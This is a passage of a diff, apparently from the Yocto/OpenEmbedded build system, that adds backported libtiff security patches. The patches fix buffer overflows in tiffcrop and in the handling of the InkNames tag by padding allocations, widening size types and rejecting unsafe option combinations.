194+ bytebuff2 = (uint8)(buff2 >> 48);
195 *dst++ = bytebuff2;
196- bytebuff3 = (buff2 >> 40);
197+ bytebuff3 = (uint8)(buff2 >> 40);
198 *dst++ = bytebuff3;
199- bytebuff4 = (buff2 >> 32);
200+ bytebuff4 = (uint8)(buff2 >> 32);
201 *dst++ = bytebuff4;
202 ready_bits -= 32;
203
204@@ -3495,13 +3512,13 @@ extractContigSamplesShifted32bits (uint8 *in, uint8 *out, uint32 cols,
205 }
206 else /* If we have a full buffer's worth, write it out */
207 {
208- bytebuff1 = (buff2 >> 56);
209+ bytebuff1 = (uint8)(buff2 >> 56);
210 *dst++ = bytebuff1;
211- bytebuff2 = (buff2 >> 48);
212+ bytebuff2 = (uint8)(buff2 >> 48);
213 *dst++ = bytebuff2;
214- bytebuff3 = (buff2 >> 40);
215+ bytebuff3 = (uint8)(buff2 >> 40);
216 *dst++ = bytebuff3;
217- bytebuff4 = (buff2 >> 32);
218+ bytebuff4 = (uint8)(buff2 >> 32);
219 *dst++ = bytebuff4;
220 ready_bits -= 32;
221
222@@ -3678,10 +3695,10 @@ extractContigSamplesToTileBuffer(uint8 *out, uint8 *in, uint32 rows, uint32 cols
223 static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
224 {
225 uint8* bufp = buf;
226- int32 bytes_read = 0;
227+ tmsize_t bytes_read = 0;
228 uint32 strip, nstrips = TIFFNumberOfStrips(in);
229- uint32 stripsize = TIFFStripSize(in);
230- uint32 rows = 0;
231+ tmsize_t stripsize = TIFFStripSize(in);
232+ tmsize_t rows = 0;
233 uint32 rps = TIFFGetFieldDefaulted(in, TIFFTAG_ROWSPERSTRIP, &rps);
234 tsize_t scanline_size = TIFFScanlineSize(in);
235
236@@ -3694,13 +3711,12 @@ static int readContigStripsIntoBuffer (TIFF* in, uint8* buf)
237 bytes_read = TIFFReadEncodedStrip (in, strip, bufp, -1);
238 rows = bytes_read / scanline_size;
239 if ((strip < (nstrips - 1)) && (bytes_read != (int32)stripsize))
240- TIFFError("", "Strip %d: read %lu bytes, strip size %lu",
241- (int)strip + 1, (unsigned long) bytes_read,
242- (unsigned long)stripsize);
243+ TIFFError("", "Strip %"PRIu32": read %"PRId64" bytes, strip size %"PRIu64,
244+ strip + 1, bytes_read, stripsize);
245
246 if (bytes_read < 0 && !ignore) {
247- TIFFError("", "Error reading strip %lu after %lu rows",
248- (unsigned long) strip, (unsigned long)rows);
249+ TIFFError("", "Error reading strip %"PRIu32" after %"PRIu64" rows",
250+ strip, rows);
251 return 0;
252 }
253 bufp += stripsize;
254@@ -4164,13 +4180,13 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
255 /* If we have a full buffer's worth, write it out */
256 if (ready_bits >= 32)
257 {
258- bytebuff1 = (buff2 >> 56);
259+ bytebuff1 = (uint8)(buff2 >> 56);
260 *dst++ = bytebuff1;
261- bytebuff2 = (buff2 >> 48);
262+ bytebuff2 = (uint8)(buff2 >> 48);
263 *dst++ = bytebuff2;
264- bytebuff3 = (buff2 >> 40);
265+ bytebuff3 = (uint8)(buff2 >> 40);
266 *dst++ = bytebuff3;
267- bytebuff4 = (buff2 >> 32);
268+ bytebuff4 = (uint8)(buff2 >> 32);
269 *dst++ = bytebuff4;
270 ready_bits -= 32;
271
272@@ -4213,10 +4229,10 @@ combineSeparateSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
273 "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
274 row + 1, col + 1, src_byte, src_bit, dst - out);
275
276- dump_long (dumpfile, format, "Match bits ", matchbits);
277+ dump_wide (dumpfile, format, "Match bits ", matchbits);
278 dump_data (dumpfile, format, "Src bits ", src, 4);
279- dump_long (dumpfile, format, "Buff1 bits ", buff1);
280- dump_long (dumpfile, format, "Buff2 bits ", buff2);
281+ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
282+ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
283 dump_byte (dumpfile, format, "Write bits1", bytebuff1);
284 dump_byte (dumpfile, format, "Write bits2", bytebuff2);
285 dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
286@@ -4689,13 +4705,13 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
287 /* If we have a full buffer's worth, write it out */
288 if (ready_bits >= 32)
289 {
290- bytebuff1 = (buff2 >> 56);
291+ bytebuff1 = (uint8)(buff2 >> 56);
292 *dst++ = bytebuff1;
293- bytebuff2 = (buff2 >> 48);
294+ bytebuff2 = (uint8)(buff2 >> 48);
295 *dst++ = bytebuff2;
296- bytebuff3 = (buff2 >> 40);
297+ bytebuff3 = (uint8)(buff2 >> 40);
298 *dst++ = bytebuff3;
299- bytebuff4 = (buff2 >> 32);
300+ bytebuff4 = (uint8)(buff2 >> 32);
301 *dst++ = bytebuff4;
302 ready_bits -= 32;
303
304@@ -4738,10 +4754,10 @@ combineSeparateTileSamples32bits (uint8 *in[], uint8 *out, uint32 cols,
305 "Row %3d, Col %3d, Src byte offset %3d bit offset %2d Dst offset %3d",
306 row + 1, col + 1, src_byte, src_bit, dst - out);
307
308- dump_long (dumpfile, format, "Match bits ", matchbits);
309+ dump_wide (dumpfile, format, "Match bits ", matchbits);
310 dump_data (dumpfile, format, "Src bits ", src, 4);
311- dump_long (dumpfile, format, "Buff1 bits ", buff1);
312- dump_long (dumpfile, format, "Buff2 bits ", buff2);
313+ dump_wide (dumpfile, format, "Buff1 bits ", buff1);
314+ dump_wide (dumpfile, format, "Buff2 bits ", buff2);
315 dump_byte (dumpfile, format, "Write bits1", bytebuff1);
316 dump_byte (dumpfile, format, "Write bits2", bytebuff2);
317 dump_info (dumpfile, format, "", "Ready bits: %2d", ready_bits);
318@@ -4764,7 +4780,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
319 {
320 int i, bytes_per_sample, bytes_per_pixel, shift_width, result = 1;
321 uint32 j;
322- int32 bytes_read = 0;
323+ tmsize_t bytes_read = 0;
324 uint16 bps = 0, planar;
325 uint32 nstrips;
326 uint32 strips_per_sample;
327@@ -4830,7 +4846,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
328 for (s = 0; (s < spp) && (s < MAX_SAMPLES); s++)
329 {
330 srcbuffs[s] = NULL;
331- buff = _TIFFmalloc(stripsize + 3);
332+ buff = _TIFFmalloc(stripsize + NUM_BUFF_OVERSIZE_BYTES);
333 if (!buff)
334 {
335 TIFFError ("readSeparateStripsIntoBuffer",
336@@ -4853,7 +4869,7 @@ static int readSeparateStripsIntoBuffer (TIFF *in, uint8 *obuf, uint32 length,
337 buff = srcbuffs[s];
338 strip = (s * strips_per_sample) + j;
339 bytes_read = TIFFReadEncodedStrip (in, strip, buff, stripsize);
340- rows_this_strip = bytes_read / src_rowsize;
341+ rows_this_strip = (uint32)(bytes_read / src_rowsize);
342 if (bytes_read < 0 && !ignore)
343 {
344 TIFFError(TIFFFileName(in),
345@@ -5860,13 +5876,14 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
346 uint16 input_compression = 0, input_photometric = 0;
347 uint16 subsampling_horiz, subsampling_vert;
348 uint32 width = 0, length = 0;
349- uint32 stsize = 0, tlsize = 0, buffsize = 0, scanlinesize = 0;
350+ tmsize_t stsize = 0, tlsize = 0, buffsize = 0;
351+ tmsize_t scanlinesize = 0;
352 uint32 tw = 0, tl = 0; /* Tile width and length */
353- uint32 tile_rowsize = 0;
354+ tmsize_t tile_rowsize = 0;
355 unsigned char *read_buff = NULL;
356 unsigned char *new_buff = NULL;
357 int readunit = 0;
358- static uint32 prev_readsize = 0;
359+ static tmsize_t prev_readsize = 0;
360
361 TIFFGetFieldDefaulted(in, TIFFTAG_BITSPERSAMPLE, &bps);
362 TIFFGetFieldDefaulted(in, TIFFTAG_SAMPLESPERPIXEL, &spp);
363@@ -6168,7 +6185,7 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
364 TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
365 return (-1);
366 }
367- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
368+ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
369 }
370 else
371 {
372@@ -6179,11 +6196,11 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
373 TIFFError("loadImage", "Unable to allocate/reallocate read buffer");
374 return (-1);
375 }
376- new_buff = _TIFFrealloc(read_buff, buffsize+3);
377+ new_buff = _TIFFrealloc(read_buff, buffsize + NUM_BUFF_OVERSIZE_BYTES);
378 if (!new_buff)
379 {
380 free (read_buff);
381- read_buff = (unsigned char *)_TIFFmalloc(buffsize+3);
382+ read_buff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES);
383 }
384 else
385 read_buff = new_buff;
386@@ -6256,8 +6273,13 @@ loadImage(TIFF* in, struct image_data *image, struct dump_opts *dump, unsigned c
387 dump_info (dump->infile, dump->format, "",
388 "Bits per sample %d, Samples per pixel %d", bps, spp);
389
390+ if ((uint64_t)scanlinesize > 0x0ffffffffULL) {
391+ dump_info(dump->infile, dump->format, "loadImage",
392+ "Attention: scanlinesize %"PRIu64" is larger than UINT32_MAX.\nFollowing dump might be wrong.",
393+ (uint64_t)scanlinesize);
394+ }
395 for (i = 0; i < length; i++)
396- dump_buffer(dump->infile, dump->format, 1, scanlinesize,
397+ dump_buffer(dump->infile, dump->format, 1, (uint32)scanlinesize,
398 i, read_buff + (i * scanlinesize));
399 }
400 return (0);
401@@ -7277,13 +7299,13 @@ writeSingleSection(TIFF *in, TIFF *out, struct image_data *image,
402 if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
403 TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
404 if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
405- int inknameslen = strlen(inknames) + 1;
406+ int inknameslen = (int)strlen(inknames) + 1;
407 const char* cp = inknames;
408 while (ninks > 1) {
409 cp = strchr(cp, '\0');
410 if (cp) {
411 cp++;
412- inknameslen += (strlen(cp) + 1);
413+ inknameslen += ((int)strlen(cp) + 1);
414 }
415 ninks--;
416 }
417@@ -7346,23 +7368,23 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
418
419 if (!sect_buff)
420 {
421- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
422+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
423 if (!sect_buff)
424 {
425 TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
426 return (-1);
427 }
428- _TIFFmemset(sect_buff, 0, sectsize);
429+ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
430 }
431 else
432 {
433 if (prev_sectsize < sectsize)
434 {
435- new_buff = _TIFFrealloc(sect_buff, sectsize);
436+ new_buff = _TIFFrealloc(sect_buff, sectsize + NUM_BUFF_OVERSIZE_BYTES);
437 if (!new_buff)
438 {
439 free (sect_buff);
440- sect_buff = (unsigned char *)_TIFFmalloc(sectsize);
441+ sect_buff = (unsigned char *)_TIFFmalloc(sectsize + NUM_BUFF_OVERSIZE_BYTES);
442 }
443 else
444 sect_buff = new_buff;
445@@ -7372,7 +7394,7 @@ createImageSection(uint32 sectsize, unsigned char **sect_buff_ptr)
446 TIFFError("createImageSection", "Unable to allocate/reallocate section buffer");
447 return (-1);
448 }
449- _TIFFmemset(sect_buff, 0, sectsize);
450+ _TIFFmemset(sect_buff, 0, sectsize + NUM_BUFF_OVERSIZE_BYTES);
451 }
452 }
453
454@@ -7403,17 +7425,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
455 cropsize = crop->bufftotal;
456 crop_buff = seg_buffs[0].buffer;
457 if (!crop_buff)
458- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
459+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
460 else
461 {
462 prev_cropsize = seg_buffs[0].size;
463 if (prev_cropsize < cropsize)
464 {
465- next_buff = _TIFFrealloc(crop_buff, cropsize);
466+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
467 if (! next_buff)
468 {
469 _TIFFfree (crop_buff);
470- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
471+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
472 }
473 else
474 crop_buff = next_buff;
475@@ -7426,7 +7448,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
476 return (-1);
477 }
478
479- _TIFFmemset(crop_buff, 0, cropsize);
480+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
481 seg_buffs[0].buffer = crop_buff;
482 seg_buffs[0].size = cropsize;
483
484@@ -7505,17 +7527,17 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
485 cropsize = crop->bufftotal;
486 crop_buff = seg_buffs[i].buffer;
487 if (!crop_buff)
488- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
489+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
490 else
491 {
492 prev_cropsize = seg_buffs[0].size;
493 if (prev_cropsize < cropsize)
494 {
495- next_buff = _TIFFrealloc(crop_buff, cropsize);
496+ next_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
497 if (! next_buff)
498 {
499 _TIFFfree (crop_buff);
500- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
501+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
502 }
503 else
504 crop_buff = next_buff;
505@@ -7528,7 +7550,7 @@ processCropSelections(struct image_data *image, struct crop_mask *crop,
506 return (-1);
507 }
508
509- _TIFFmemset(crop_buff, 0, cropsize);
510+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
511 seg_buffs[i].buffer = crop_buff;
512 seg_buffs[i].size = cropsize;
513
514@@ -7641,24 +7663,24 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
515 crop_buff = *crop_buff_ptr;
516 if (!crop_buff)
517 {
518- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
519+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
520 if (!crop_buff)
521 {
522 TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
523 return (-1);
524 }
525- _TIFFmemset(crop_buff, 0, cropsize);
526+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
527 prev_cropsize = cropsize;
528 }
529 else
530 {
531 if (prev_cropsize < cropsize)
532 {
533- new_buff = _TIFFrealloc(crop_buff, cropsize);
534+ new_buff = _TIFFrealloc(crop_buff, cropsize + NUM_BUFF_OVERSIZE_BYTES);
535 if (!new_buff)
536 {
537 free (crop_buff);
538- crop_buff = (unsigned char *)_TIFFmalloc(cropsize);
539+ crop_buff = (unsigned char *)_TIFFmalloc(cropsize + NUM_BUFF_OVERSIZE_BYTES);
540 }
541 else
542 crop_buff = new_buff;
543@@ -7667,7 +7689,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
544 TIFFError("createCroppedImage", "Unable to allocate/reallocate crop buffer");
545 return (-1);
546 }
547- _TIFFmemset(crop_buff, 0, cropsize);
548+ _TIFFmemset(crop_buff, 0, cropsize + NUM_BUFF_OVERSIZE_BYTES);
549 }
550 }
551
552@@ -7965,13 +7987,13 @@ writeCroppedImage(TIFF *in, TIFF *out, struct image_data *image,
553 if (TIFFGetField(in, TIFFTAG_NUMBEROFINKS, &ninks)) {
554 TIFFSetField(out, TIFFTAG_NUMBEROFINKS, ninks);
555 if (TIFFGetField(in, TIFFTAG_INKNAMES, &inknames)) {
556- int inknameslen = strlen(inknames) + 1;
557+ int inknameslen = (int)strlen(inknames) + 1;
558 const char* cp = inknames;
559 while (ninks > 1) {
560 cp = strchr(cp, '\0');
561 if (cp) {
562 cp++;
563- inknameslen += (strlen(cp) + 1);
564+ inknameslen += ((int)strlen(cp) + 1);
565 }
566 ninks--;
567 }
568@@ -8356,13 +8378,13 @@ rotateContigSamples32bits(uint16 rotation, uint16 spp, uint16 bps, uint32 width,
569 }
570 else /* If we have a full buffer's worth, write it out */
571 {
572- bytebuff1 = (buff2 >> 56);
573+ bytebuff1 = (uint8)(buff2 >> 56);
574 *dst++ = bytebuff1;
575- bytebuff2 = (buff2 >> 48);
576+ bytebuff2 = (uint8)(buff2 >> 48);
577 *dst++ = bytebuff2;
578- bytebuff3 = (buff2 >> 40);
579+ bytebuff3 = (uint8)(buff2 >> 40);
580 *dst++ = bytebuff3;
581- bytebuff4 = (buff2 >> 32);
582+ bytebuff4 = (uint8)(buff2 >> 32);
583 *dst++ = bytebuff4;
584 ready_bits -= 32;
585
586@@ -8431,12 +8453,13 @@ rotateImage(uint16 rotation, struct image_data *image, uint32 *img_width,
587 return (-1);
588 }
589
590- if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize)))
591+ /* Add 3 padding bytes for extractContigSamplesShifted32bits */
592+ if (!(rbuff = (unsigned char *)_TIFFmalloc(buffsize + NUM_BUFF_OVERSIZE_BYTES)))
593 {
594- TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize);
595+ TIFFError("rotateImage", "Unable to allocate rotation buffer of %1u bytes", buffsize + NUM_BUFF_OVERSIZE_BYTES);
596 return (-1);
597 }
598- _TIFFmemset(rbuff, '\0', buffsize);
599+ _TIFFmemset(rbuff, '\0', buffsize + NUM_BUFF_OVERSIZE_BYTES);
600
601 ibuff = *ibuff_ptr;
602 switch (rotation)
603@@ -8964,13 +8987,13 @@ reverseSamples32bits (uint16 spp, uint16 bps, uint32 width,
604 }
605 else /* If we have a full buffer's worth, write it out */
606 {
607- bytebuff1 = (buff2 >> 56);
608+ bytebuff1 = (uint8)(buff2 >> 56);
609 *dst++ = bytebuff1;
610- bytebuff2 = (buff2 >> 48);
611+ bytebuff2 = (uint8)(buff2 >> 48);
612 *dst++ = bytebuff2;
613- bytebuff3 = (buff2 >> 40);
614+ bytebuff3 = (uint8)(buff2 >> 40);
615 *dst++ = bytebuff3;
616- bytebuff4 = (buff2 >> 32);
617+ bytebuff4 = (uint8)(buff2 >> 32);
618 *dst++ = bytebuff4;
619 ready_bits -= 32;
620
621@@ -9061,12 +9084,13 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
622 {
623 case MIRROR_BOTH:
624 case MIRROR_VERT:
625- line_buff = (unsigned char *)_TIFFmalloc(rowsize);
626+ line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES);
627 if (line_buff == NULL)
628 {
629- TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize);
630+ TIFFError ("mirrorImage", "Unable to allocate mirror line buffer of %1u bytes", rowsize + NUM_BUFF_OVERSIZE_BYTES);
631 return (-1);
632 }
633+ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
634
635 dst = ibuff + (rowsize * (length - 1));
636 for (row = 0; row < length / 2; row++)
637@@ -9098,11 +9122,12 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
638 }
639 else
640 { /* non 8 bit per sample data */
641- if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + 1)))
642+ if (!(line_buff = (unsigned char *)_TIFFmalloc(rowsize + NUM_BUFF_OVERSIZE_BYTES)))
643 {
644 TIFFError("mirrorImage", "Unable to allocate mirror line buffer");
645 return (-1);
646 }
647+ _TIFFmemset(line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
648 bytes_per_sample = (bps + 7) / 8;
649 bytes_per_pixel = ((bps * spp) + 7) / 8;
650 if (bytes_per_pixel < (bytes_per_sample + 1))
651@@ -9114,7 +9139,7 @@ mirrorImage(uint16 spp, uint16 bps, uint16 mirror, uint32 width, uint32 length,
652 {
653 row_offset = row * rowsize;
654 src = ibuff + row_offset;
655- _TIFFmemset (line_buff, '\0', rowsize);
656+ _TIFFmemset (line_buff, '\0', rowsize + NUM_BUFF_OVERSIZE_BYTES);
657 switch (shift_width)
658 {
659 case 1: if (reverseSamples16bits(spp, bps, width, src, line_buff))
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
new file mode 100644
index 0000000000..18a4b4e0ff
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3597_3626_3627.patch
@@ -0,0 +1,123 @@
1From f7c06c395daf1b2c52ab431e00db2d9fc2ac993e Mon Sep 17 00:00:00 2001
2From: Su Laus <sulau@freenet.de>
3Date: Tue, 10 May 2022 20:03:17 +0000
4Subject: [PATCH] tiffcrop: Fix issue #330 and some more from 320 to 349
5
6Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
7CVE: CVE-2022-3597 CVE-2022-3626 CVE-2022-3627
8Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
9
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/e319508023580e2f70e6e626f745b5b2a1707313
11Origin: https://gitlab.com/libtiff/libtiff/-/commit/8fe3735942ea1d90d8cef843b55b3efe8ab6feaf
12Origin: https://gitlab.com/libtiff/libtiff/-/commit/bad48e90b410df32172006c7876da449ba62cdba
13Origin: https://gitlab.com/libtiff/libtiff/-/commit/236b7191f04c60d09ee836ae13b50f812c841047
14Reviewed-by: Sylvain Beucler <beuc@debian.org>
15Last-Update: 2023-01-17
16
17---
18 tools/tiffcrop.c | 50 ++++++++++++++++++++++++++++++++++++++++--------
19 1 file changed, 42 insertions(+), 8 deletions(-)
20
21diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
22index c923920..a0789a3 100644
23--- a/tools/tiffcrop.c
24+++ b/tools/tiffcrop.c
25@@ -103,7 +103,12 @@
26 * selects which functions dump data, with higher numbers selecting
27 * lower level, scanline level routines. Debug reports a limited set
28 * of messages to monitor progess without enabling dump logs.
29- */
30+ *
31+ * Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.
32+ * In no case should the options be applied to a given selection successively.
33+ * Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
34+ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
35+ */
36
37 static char tiffcrop_version_id[] = "2.4.1";
38 static char tiffcrop_rev_date[] = "03-03-2010";
39@@ -176,12 +181,12 @@ extern int getopt(int argc, char * const argv[], const char *optstring);
40 #define ROTATECW_270 32
41 #define ROTATE_ANY (ROTATECW_90 | ROTATECW_180 | ROTATECW_270)
42
43-#define CROP_NONE 0
44-#define CROP_MARGINS 1
45-#define CROP_WIDTH 2
46-#define CROP_LENGTH 4
47-#define CROP_ZONES 8
48-#define CROP_REGIONS 16
49+#define CROP_NONE 0 /* "-S" -> Page_MODE_ROWSCOLS and page->rows/->cols != 0 */
50+#define CROP_MARGINS 1 /* "-m" */
51+#define CROP_WIDTH 2 /* "-X" */
52+#define CROP_LENGTH 4 /* "-Y" */
53+#define CROP_ZONES 8 /* "-Z" */
54+#define CROP_REGIONS 16 /* "-z" */
55 #define CROP_ROTATE 32
56 #define CROP_MIRROR 64
57 #define CROP_INVERT 128
58@@ -323,7 +328,7 @@ struct crop_mask {
59 #define PAGE_MODE_RESOLUTION 1
60 #define PAGE_MODE_PAPERSIZE 2
61 #define PAGE_MODE_MARGINS 4
62-#define PAGE_MODE_ROWSCOLS 8
63+#define PAGE_MODE_ROWSCOLS 8 /* for -S option */
64
65 #define INVERT_DATA_ONLY 10
66 #define INVERT_DATA_AND_TAG 11
67@@ -754,6 +759,12 @@ static char* usage_info[] = {
68 " The four debug/dump options are independent, though it makes little sense to",
69 " specify a dump file without specifying a detail level.",
70 " ",
71+"Note 1: The (-X|-Y), -Z, -z and -S options are mutually exclusive.",
72+" In no case should the options be applied to a given selection successively.",
73+" ",
74+"Note 2: Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options",
75+" such as - H, -V, -P, -J or -K are not supported and may cause buffer overflows.",
76+" ",
77 NULL
78 };
79
80@@ -2112,6 +2123,27 @@ void process_command_opts (int argc, char *argv[], char *mp, char *mode, uint32
81 /*NOTREACHED*/
82 }
83 }
84+ /*-- Check for not allowed combinations (e.g. -X, -Y and -Z, -z and -S are mutually exclusive) --*/
85+ char XY, Z, R, S;
86+ XY = ((crop_data->crop_mode & CROP_WIDTH) || (crop_data->crop_mode & CROP_LENGTH)) ? 1 : 0;
87+ Z = (crop_data->crop_mode & CROP_ZONES) ? 1 : 0;
88+ R = (crop_data->crop_mode & CROP_REGIONS) ? 1 : 0;
89+ S = (page->mode & PAGE_MODE_ROWSCOLS) ? 1 : 0;
90+ if (XY + Z + R + S > 1) {
91+ TIFFError("tiffcrop input error", "The crop options(-X|-Y), -Z, -z and -S are mutually exclusive.->exit");
92+ exit(EXIT_FAILURE);
93+ }
94+
95+ /* Check for not allowed combination:
96+ * Any of the -X, -Y, -Z and -z options together with other PAGE_MODE_x options
97+ * such as -H, -V, -P, -J or -K are not supported and may cause buffer overflows.
98+. */
99+ if ((XY + Z + R > 0) && page->mode != PAGE_MODE_NONE) {
100+ TIFFError("tiffcrop input error",
101+ "Any of the crop options -X, -Y, -Z and -z together with other PAGE_MODE_x options such as - H, -V, -P, -J or -K is not supported and may cause buffer overflows..->exit");
102+ exit(EXIT_FAILURE);
103+ }
104+
105 } /* end process_command_opts */
106
107 /* Start a new output file if one has not been previously opened or
108@@ -2384,6 +2416,7 @@ main(int argc, char* argv[])
109 exit (-1);
110 }
111
112+ /* Crop input image and copy zones and regions from input image into seg_buffs or crop_buff. */
113 if (crop.selections > 0)
114 {
115 if (processCropSelections(&image, &crop, &read_buff, seg_buffs))
116@@ -2400,6 +2433,7 @@ main(int argc, char* argv[])
117 exit (-1);
118 }
119 }
120+ /* Format and write selected image parts to output file(s). */
121 if (page.mode == PAGE_MODE_NONE)
122 { /* Whole image or sections not based on output page size */
123 if (crop.selections > 0)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
new file mode 100644
index 0000000000..b3232d9002
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2022-3599.patch
@@ -0,0 +1,277 @@
1From 01bca7e6f608da7696949fca6acda78b9935ba19 Mon Sep 17 00:00:00 2001
2From: Su_Laus <sulau@freenet.de>
3Date: Tue, 30 Aug 2022 16:56:48 +0200
4Subject: [PATCH] Revised handling of TIFFTAG_INKNAMES and related
5
6Upstream-Status: Backport [import from debian http://security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u7.debian.tar.xz ]
7CVE: CVE-2022-3599 CVE-2022-4645 CVE-2023-30774
8Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
9
10Origin: https://gitlab.com/libtiff/libtiff/-/commit/e813112545942107551433d61afd16ac094ff246
11Reviewed-by: Sylvain Beucler <beuc@debian.org>
12Last-Update: 2023-01-17
13
14 TIFFTAG_NUMBEROFINKS value
15
16In order to solve the buffer overflow issues related to TIFFTAG_INKNAMES and related TIFFTAG_NUMBEROFINKS value, a revised handling of those tags within LibTiff is proposed:
17
18Behaviour for writing:
19 `NumberOfInks` MUST fit to the number of inks in the `InkNames` string.
20 `NumberOfInks` is automatically set when `InkNames` is set.
21 If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
22 If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
23
24Behaviour for reading:
25 When reading `InkNames` from a TIFF file, the `NumberOfInks` will be set automatically to the number of inks in `InkNames` string.
26 If `NumberOfInks` is different to the number of inks within `InkNames` string, that will be corrected and a warning is issued.
27 If `NumberOfInks` is not equal to samplesperpixel only a warning will be issued.
28
29This allows the safe use of the NumberOfInks value to read out the InkNames without buffer overflow
30
31This MR will close the following issues: #149, #150, #152, #168 (to be checked), #250, #269, #398 and #456.
32
33It also fixes the old bug at http://bugzilla.maptools.org/show_bug.cgi?id=2599, for which the limitation of `NumberOfInks = SPP` was introduced, which is in my opinion not necessary and does not solve the general issue.
34
35---
36 libtiff/tif_dir.c | 120 ++++++++++++++++++++++++-----------------
37 libtiff/tif_dir.h | 2 +
38 libtiff/tif_dirinfo.c | 2 +-
39 libtiff/tif_dirwrite.c | 5 ++
40 libtiff/tif_print.c | 4 ++
41 5 files changed, 83 insertions(+), 50 deletions(-)
42
43diff --git a/libtiff/tif_dir.c b/libtiff/tif_dir.c
44index 39aeeb4..9d8267a 100644
45--- a/libtiff/tif_dir.c
46+++ b/libtiff/tif_dir.c
47@@ -29,6 +29,7 @@
48 * (and also some miscellaneous stuff)
49 */
50 #include "tiffiop.h"
51+# include <inttypes.h>
52
53 /*
54 * These are used in the backwards compatibility code...
55@@ -137,32 +138,30 @@ setExtraSamples(TIFF* tif, va_list ap, uint32* v)
56 }
57
58 /*
59- * Confirm we have "samplesperpixel" ink names separated by \0. Returns
60+ * Count ink names separated by \0. Returns
61 * zero if the ink names are not as expected.
62 */
63-static uint32
64-checkInkNamesString(TIFF* tif, uint32 slen, const char* s)
65+static uint16
